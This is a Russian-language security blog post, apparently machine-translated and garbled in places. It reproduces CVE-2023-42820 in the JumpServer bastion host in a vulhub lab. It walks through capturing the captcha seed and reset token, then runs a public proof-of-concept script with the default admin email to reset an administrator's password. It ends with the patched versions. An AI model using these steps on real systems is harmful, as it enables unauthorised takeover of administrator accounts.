Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: E1gHt@Timeline Sec Количество слов в этой статье: 886 Время чтения: 2-3 минуты. Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.
Хост-бастион JumpServer с открытым исходным кодом — это продукт системы аудита безопасности эксплуатации и обслуживания, который обеспечивает аутентификацию личности, контроль авторизации, управление учетными записями, аудит безопасности и другую функциональную поддержку, помогая предприятиям быстро создавать возможности аудита безопасности эксплуатации и обслуживания. Бастионная машина JumpServer с открытым исходным кодом предоставляет дополнительные решения по аудиту безопасности эксплуатации и обслуживания с открытым исходным кодом для пользователей корпоративного уровня через корпоративную версию или универсальную программно-аппаратную машину.
Номер уязвимости: CVE-2023-42820.
Суть уязвимости связана с утечкой начальных значений случайных чисел. Неавторизованные злоумышленники могут использовать эту уязвимость, чтобы определить «токен сброса пароля» учетной записи, в которой не включена многофакторная аутентификация (MFA), а затем изменить пароль. счета.
Затронутые версии: v2.24 – v3.6.4.
Сборка с использованием докера в vulhub
cd vulhub/jumpserver/CVE-2023-42820
docker-compose up -d
Сначала откройте страницу забытого пароля в первой вкладке браузера:
http://your-ip:8080/core/auth/password/forget/previewing/
На этом этапе на странице будет код подтверждения.
новыйTabсередина Проверочный кодизURLПохоже на:http://your-ip:8080/core/auth/captcha/image/f6653774c319e128842bc9072180922e5ee21819/
,Чтосередина Содержит это Проверочный ключ кода (строка sha1 хэш-значение),То есть начальное число, используемое позже для псевдослучайных чисел.,запиши этоценитькакseed
Вернуться на первую вкладку,обновить страницу。обновить Цель страницы - не использовать Проверочный, содержащий "семена" код, потому что это начальное значение будет использоваться на последующих шагах.
После обновления страницы правильно введите имя пользователя и код подтверждения, отправьте их и перейдите на страницу проверки кода подтверждения.
Эта страница в это времяизURLПохоже на:http://localhost:8080/core/auth/password/forgot/?token=mf3L8YDLBK21Av9fq4mUpASU6q9ernjgcuWQ
,Он содержит случайное значение токена,запиши этоценитькакtoken。
Использование скриптов от вулхаба
https://github.com/vulhub/vulhub/blob/master/jumpserver/CVE-2023-42820/poc.py
Учетная запись электронной почты администратора по умолчанию — admin@mycomany.com.
python3 poc.py -t http://127.0.0.1:8080/ --email admin@mycomany.com --seed f6653774c319e128842bc9072180922e5ee21819 --token mf3L8YDLBK21Av9fq4mUpASU6q9ernjgcuWQ
Введите код подтверждения 452361, пароль успешно сброшен.
Успешно авторизован
Обновите до безопасной версии:
v2Версия:>= v2.28.19
v3Версия:>= v3.6.5